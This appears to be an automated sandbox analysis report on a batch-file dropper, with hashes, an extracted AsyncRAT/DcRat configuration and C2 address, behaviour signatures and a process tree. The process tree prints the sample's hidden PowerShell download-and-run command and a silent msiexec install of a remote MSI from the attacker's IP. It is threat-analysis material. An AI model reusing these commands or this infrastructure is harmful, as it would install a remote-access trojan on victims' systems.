Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 19:30
Static task
static1
Behavioral task
behavioral1
Sample
frobf.bat
Resource
win7-20240221-en
General
-
Target
frobf.bat
-
Size
17KB
-
MD5
389078feb0d26c841b905168deaecd15
-
SHA1
e0013a66fad26afbbac701c3fbd6a0d85ddce3c9
-
SHA256
f21b7aec9770dc80d20ac5fd871b6b88b7ba4586c2ae56faf724a23ee64a6193
-
SHA512
ce51959c6d29112e575350013be45f87907edb9dc2c6bc3c8dc566e251a350bc361380202c34874aef71085f745dbf4e4ae4a760f457f49ff5e36f238785d238
-
SSDEEP
192:oZYztAEqvAb5JqjbLoUfSY1PfcLCL6lh2uxHwNy/FDcTjNolW/uw6yfzyKe:oZY5AEqvA5JEoiJ1PfcL1PDwiMVvWKe
Malware Config
Extracted
http://103.179.189.111/porn.png
Extracted
asyncrat
1.0.7
Default
103.179.189.111:8848
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe family_asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 6 3956 powershell.exe 24 1820 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 1 IoCs
Processes:
Client.exepid process 1900 Client.exe -
Loads dropped DLL 1 IoCs
Processes:
MsiExec.exepid process 2156 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 2284 msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe -
Drops file in Windows directory 7 IoCs
Processes:
msiexec.exeEXPAND.EXEdescription ioc process File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI3F4.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log EXPAND.EXE File opened for modification C:\Windows\LOGS\DPX\setuperr.log EXPAND.EXE File opened for modification C:\Windows\Installer\MSIFA4E.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exemsiexec.exeClient.exepid process 3956 powershell.exe 3956 powershell.exe 1820 msiexec.exe 1820 msiexec.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe 1900 Client.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
powershell.exemsiexec.exemsiexec.exeClient.exedescription pid process Token: SeDebugPrivilege 3956 powershell.exe Token: SeShutdownPrivilege 2284 msiexec.exe Token: SeIncreaseQuotaPrivilege 2284 msiexec.exe Token: SeSecurityPrivilege 1820 msiexec.exe Token: SeCreateTokenPrivilege 2284 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2284 msiexec.exe Token: SeLockMemoryPrivilege 2284 msiexec.exe Token: SeIncreaseQuotaPrivilege 2284 msiexec.exe Token: SeMachineAccountPrivilege 2284 msiexec.exe Token: SeTcbPrivilege 2284 msiexec.exe Token: SeSecurityPrivilege 2284 msiexec.exe Token: SeTakeOwnershipPrivilege 2284 msiexec.exe Token: SeLoadDriverPrivilege 2284 msiexec.exe Token: SeSystemProfilePrivilege 2284 msiexec.exe Token: SeSystemtimePrivilege 2284 msiexec.exe Token: SeProfSingleProcessPrivilege 2284 msiexec.exe Token: SeIncBasePriorityPrivilege 2284 msiexec.exe Token: SeCreatePagefilePrivilege 2284 msiexec.exe Token: SeCreatePermanentPrivilege 2284 msiexec.exe Token: SeBackupPrivilege 2284 msiexec.exe Token: SeRestorePrivilege 2284 msiexec.exe Token: SeShutdownPrivilege 2284 msiexec.exe Token: SeDebugPrivilege 2284 msiexec.exe Token: SeAuditPrivilege 2284 msiexec.exe Token: SeSystemEnvironmentPrivilege 2284 msiexec.exe Token: SeChangeNotifyPrivilege 2284 msiexec.exe Token: SeRemoteShutdownPrivilege 2284 msiexec.exe Token: SeUndockPrivilege 2284 msiexec.exe Token: SeSyncAgentPrivilege 2284 msiexec.exe Token: SeEnableDelegationPrivilege 2284 msiexec.exe Token: SeManageVolumePrivilege 2284 msiexec.exe Token: SeImpersonatePrivilege 2284 msiexec.exe Token: SeCreateGlobalPrivilege 2284 msiexec.exe Token: SeRestorePrivilege 1820 msiexec.exe Token: SeTakeOwnershipPrivilege 1820 msiexec.exe Token: SeRestorePrivilege 1820 msiexec.exe Token: SeTakeOwnershipPrivilege 1820 msiexec.exe Token: SeDebugPrivilege 1900 Client.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
cmd.exemsiexec.exeMsiExec.exedescription pid process target process PID 2420 wrote to memory of 1176 2420 cmd.exe chcp.com PID 2420 wrote to memory of 1176 2420 cmd.exe chcp.com PID 2420 wrote to memory of 4672 2420 cmd.exe cmd.exe PID 2420 wrote to memory of 4672 2420 cmd.exe cmd.exe PID 2420 wrote to memory of 464 2420 cmd.exe find.exe PID 2420 wrote to memory of 464 2420 cmd.exe find.exe PID 2420 wrote to memory of 4936 2420 cmd.exe find.exe PID 2420 wrote to memory of 4936 2420 cmd.exe find.exe PID 2420 wrote to memory of 4564 2420 cmd.exe findstr.exe PID 2420 wrote to memory of 4564 2420 cmd.exe findstr.exe PID 2420 wrote to memory of 4700 2420 cmd.exe findstr.exe PID 2420 wrote to memory of 4700 2420 cmd.exe findstr.exe PID 2420 wrote to memory of 2500 2420 cmd.exe findstr.exe PID 2420 wrote to memory of 2500 2420 cmd.exe findstr.exe PID 2420 wrote to memory of 4452 2420 cmd.exe findstr.exe PID 2420 wrote to memory of 4452 2420 cmd.exe findstr.exe PID 2420 wrote to memory of 3228 2420 cmd.exe cmd.exe PID 2420 wrote to memory of 3228 2420 cmd.exe cmd.exe PID 2420 wrote to memory of 3956 2420 cmd.exe powershell.exe PID 2420 wrote to memory of 3956 2420 cmd.exe powershell.exe PID 2420 wrote to memory of 2284 2420 cmd.exe msiexec.exe PID 2420 wrote to memory of 2284 2420 cmd.exe msiexec.exe PID 1820 wrote to memory of 2156 1820 msiexec.exe MsiExec.exe PID 1820 wrote to memory of 2156 1820 msiexec.exe MsiExec.exe PID 1820 wrote to memory of 2156 1820 msiexec.exe MsiExec.exe PID 2156 wrote to memory of 736 2156 MsiExec.exe ICACLS.EXE PID 2156 wrote to memory of 736 2156 MsiExec.exe ICACLS.EXE PID 2156 wrote to memory of 736 2156 MsiExec.exe ICACLS.EXE PID 2156 wrote to memory of 5056 2156 MsiExec.exe EXPAND.EXE PID 2156 wrote to memory of 5056 2156 MsiExec.exe EXPAND.EXE PID 2156 wrote to memory of 5056 2156 MsiExec.exe EXPAND.EXE PID 2156 wrote to memory of 1900 2156 MsiExec.exe Client.exe PID 2156 wrote to memory of 1900 2156 MsiExec.exe Client.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frobf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\chcp.comchcp.com 4372⤵PID:1176
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:4672
-
C:\Windows\system32\find.exefind2⤵PID:464
-
C:\Windows\system32\find.exefind2⤵PID:4936
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\frobf.bat2⤵PID:4564
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\frobf.bat2⤵PID:4700
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\frobf.bat2⤵PID:2500
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\frobf.bat2⤵PID:4452
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:3228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://103.179.189.111/porn.png', \"$env:TEMP\al.png\"); start \"$env:TEMP\al.png\"}"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956 -
C:\Windows\system32\msiexec.exemsiexec /quiet /i http://103.179.189.111/Client.msi2⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D8446F08BE7561A332BBF6422E6793462⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
PID:736 -
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe"C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3468,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:81⤵PID:4624
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files.cabFilesize
47KB
MD516ebf2cc73df381da5b897f52a78ee22
SHA1c2689939e1c957c30ef261f139057a973c618f47
SHA256b2f5fcf9b63c873170b0cf7680831251dcc38c703e42fb558bed2120bd15e156
SHA512cfb58afd9b6b6433dedc8e2364013845d8ca023025ac8a8fecd7930493abc80c5f4961ee279ea06d7658adb4e9f2893c9ece0af8b2ae278d1f99713255a3f683
-
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exeFilesize
47KB
MD5c69f098974248c79def70daf8b16bb8b
SHA1793c9cd72b635d731686db373b5136ff63cabc0a
SHA25693a0782c15f0c0049c85a07d09742805398aa6491b0b5a31d25603dc233c8f7d
SHA512d4d29f682cd42a3b494563929ae33356a386f2e9383010fdac8e95ce4c3e77100979d9040faeeb419eaecd82cee66a0521f2d50ee140ac7e0d7b25e77e2ae945
-
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\msiwrapper.iniFilesize
1KB
MD574ccf3d9d55761c104c6848000c67615
SHA16b60a8ccb87911ce3dffabb11ad3ed7e53200b73
SHA256249b4be1330e10d2299d3ce0b6735365abc3ae024ce268dfb708ff2cab770397
SHA512b179fbd99d36f2a9ff889e88fc6ea78aca97b955bc3502be6ba1b5e85c5ba888149b50f254e5c047f24e3027e52a7cdb2bce0b3a78d939303ab332689a335998
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55igihae.jwr.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmpFilesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
C:\Windows\Installer\MSI3F4.tmpFilesize
208KB
MD50c8921bbcc37c6efd34faf44cf3b0cb5
SHA1dcfa71246157edcd09eecaf9d4c5e360b24b3e49
SHA256fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1
SHA512ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108
-
C:\Windows\Installer\MSIFA4E.tmpFilesize
292KB
MD56bd9dac0f28211bda45fb0c569580e65
SHA1d2b53dbd29537d7844d17f60c3ca263740a7b8db
SHA256fecd40361bf0eccab0681d13c32136860ebf9b8d5cc96c4eda6a43af32abe079
SHA512c3f30f6bd2f2b60b65b3da0e96c1738dc859455cccb354b57d97ad8fe200bea71adf32b865903efac2bc2c8d833dd7d23956dfa7cf3dcefaec63ca47f6fd6ab1
-
memory/1900-90-0x0000000000EE0000-0x0000000000EF2000-memory.dmpFilesize
72KB
-
memory/3956-15-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmpFilesize
10.8MB
-
memory/3956-16-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmpFilesize
10.8MB
-
memory/3956-20-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmpFilesize
10.8MB
-
memory/3956-5-0x0000012BF0A10000-0x0000012BF0A32000-memory.dmpFilesize
136KB
-
memory/3956-4-0x00007FFF91313000-0x00007FFF91315000-memory.dmpFilesize
8KB